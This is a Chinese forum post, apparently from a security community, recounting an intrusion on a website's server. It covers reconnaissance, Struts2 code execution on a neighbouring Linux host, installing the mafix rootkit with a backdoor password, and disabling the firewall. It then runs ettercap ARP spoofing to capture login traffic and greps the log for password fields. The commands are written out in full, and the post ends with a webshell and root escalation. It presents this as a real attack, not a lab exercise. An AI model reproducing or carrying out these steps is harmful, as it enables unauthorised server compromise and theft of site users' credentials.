首页
社区
课程
招聘
Linux下嗅探密码拿下服务器
发表于: 2014-12-31 15:01 890

Linux下嗅探密码拿下服务器

2014-12-31 15:01
890
0x01 主站踩点

主站dedecms 目前公布的0day没有一个能用的,并且后台不是默认的,google hack无果。

0x02 旁站分析

        旁站有二十多个,大部分是现场的cms的二次开发,没有漏洞,还有一个bbs dz,同样也没有漏洞

0x03 C段Linux主机突破

       查询C段 浏览网站 发现一个 ssss.com/login.action ,熟悉吧 struct2代码执行 不解释

0x04 Linux主机 栽Rookit

     

     这里我用的Rookit是mafix

   执行命令:

            tar zxvf mafix.tar.gz

     chmod +x root

   ./root password 23141

   Putty登录

      注意 如果防火墙开着的话,不愿意在防火墙里添加规则的话可以关掉防火墙

  停止防火墙

   /etc/init.d/iptables stop

版本
0x05  Linux主机 安装ettercap 嗅探密码

    1、 下载与安装EPEL的RPM包。

         rpm -ivh ac9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8D9i4K6u0W2k6X3g2V1L8%4u0S2M7s2u0G2K9X3g2U0N6q4)9J5k6h3!0J5k6#2)9J5c8Y4m8#2j5W2)9J5c8X3g2H3k6h3I4Q4x3V1j5#2i4K6u0r3K9e0x3^5y4W2)9J5c8X3g2H3k6h3I4Q4x3X3c8J5k6h3I4W2j5i4y4W2i4K6u0V1y4g2)9J5k6o6c8Q4x3X3g2F1L8$3q4J5j5$3S2Q4x3X3g2J5M7r3@1`.

           2、 yum -y install ettercap

    开始嗅探

    开启转发(可能不需要)

      echo 1 > /proc/sys/net/ipv4/ip_forward

    嗅探

     ettercap –T –M arp /目标ip/80 /网关/ -w /tmp/log.txt

   嗅探时间可能会挺长 可以后台运行

     nohup ettercap –T –M arp /目标ip/80 /网关/-w /tmp/log.txt

0x06 数据筛选

   由于这个网站的数据特别大,一小时的数据有1g多,好吧,grep筛选出

   抓包分析出目标站前台提交的密码的字段 pwd

    cat /tmp/log.txt | grep –a “&pwd=” | more

   好吧,每隔几小时我就看一次,过了半天,嗅到后台密码了,同时也嗅到后台地址了

   bd0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8Y4S2^5P5q4)9J5c8X3I4G2k6$3W2F1i4K6u0W2M7r3S2H3i4K6g2p5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8Y4S2^5P5q4)9J5c8X3I4G2k6$3W2F1i4K6u0W2M7r3S2H3i4K6g2p5N6%4N6%4i4K6u0W2P5s2S2^5i4K6u0W2j5$3!0E0i4K6u0r3P5s2S2^5i4K6u0r3L8r3!0Y4K9h3&6Q4x3X3g2H3K9s2l9`.

0x07 上传一句话 root提权

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回